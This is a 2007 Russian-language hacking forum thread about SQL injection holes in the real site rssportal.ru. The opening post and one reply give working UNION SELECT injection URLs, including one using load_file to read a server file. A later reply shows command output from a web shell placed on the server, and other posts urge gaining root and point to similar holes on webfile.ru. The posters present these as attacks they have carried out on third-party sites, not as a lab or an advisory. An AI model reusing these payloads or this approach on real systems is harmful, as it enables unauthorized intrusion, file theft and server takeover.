ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Injection на rssportal.ru
  #1  
Старый 01.06.2007, 18:47
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию Injection на rssportal.ru

Injection на rssportal.ru

Хотелось бы отметить ету инж., так как там есть сами посмотрите что
Хотя ето не новость

Вот ищо несколько injection на етом же сайте:

Код:
http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
Код:
http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*
Код:
http://rssportal.ru/registration.php?uid=1&confirm=blablabla'
Вот и видео: http://video.antichat.ru/download_228.html

Последний раз редактировалось Micr0b; 14.06.2007 в 17:06..
 
Ответить с цитированием

  #2  
Старый 01.06.2007, 18:55
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Смотрел на ускоренном воспроизведении(: Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
PS Вот если бы ты шелл залил, был бы хоть какой то материал.
__________________
..
 
Ответить с цитированием

  #3  
Старый 02.06.2007, 02:05
wix
Новичок
Регистрация: 23.05.2007
Сообщений: 19
Провел на форуме:
237993

Репутация: 7
По умолчанию

Код:
http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/*
даж файлы читать мона)
 
Ответить с цитированием

  #4  
Старый 02.06.2007, 09:24
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

молодец микроб
 
Ответить с цитированием

  #5  
Старый 02.06.2007, 14:23
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Вот если бы ты шелл залил, был бы хоть какой то материал
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)

Последний раз редактировалось Spyder; 02.06.2007 в 14:31..
 
Ответить с цитированием

  #6  
Старый 02.06.2007, 14:35
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Spyder  
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
Вот если бы кто нибудь рут взял
__________________
..
 
Ответить с цитированием

  #7  
Старый 02.06.2007, 14:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
 
Ответить с цитированием

  #8  
Старый 25.06.2007, 02:13
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
Сообщение от Spyder  
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
На webfile.ru запись в корень сайта есть и скуль...шелл тоже там есть
 
Ответить с цитированием

  #9  
Старый 25.06.2007, 09:48
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Да и админка там есть )))
 
Ответить с цитированием

  #10  
Старый 25.06.2007, 09:54
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию

Да и приват на ачате никогда не палиться половиной ачата
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
CRLF injection Electro Уязвимости 6 22.08.2006 14:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ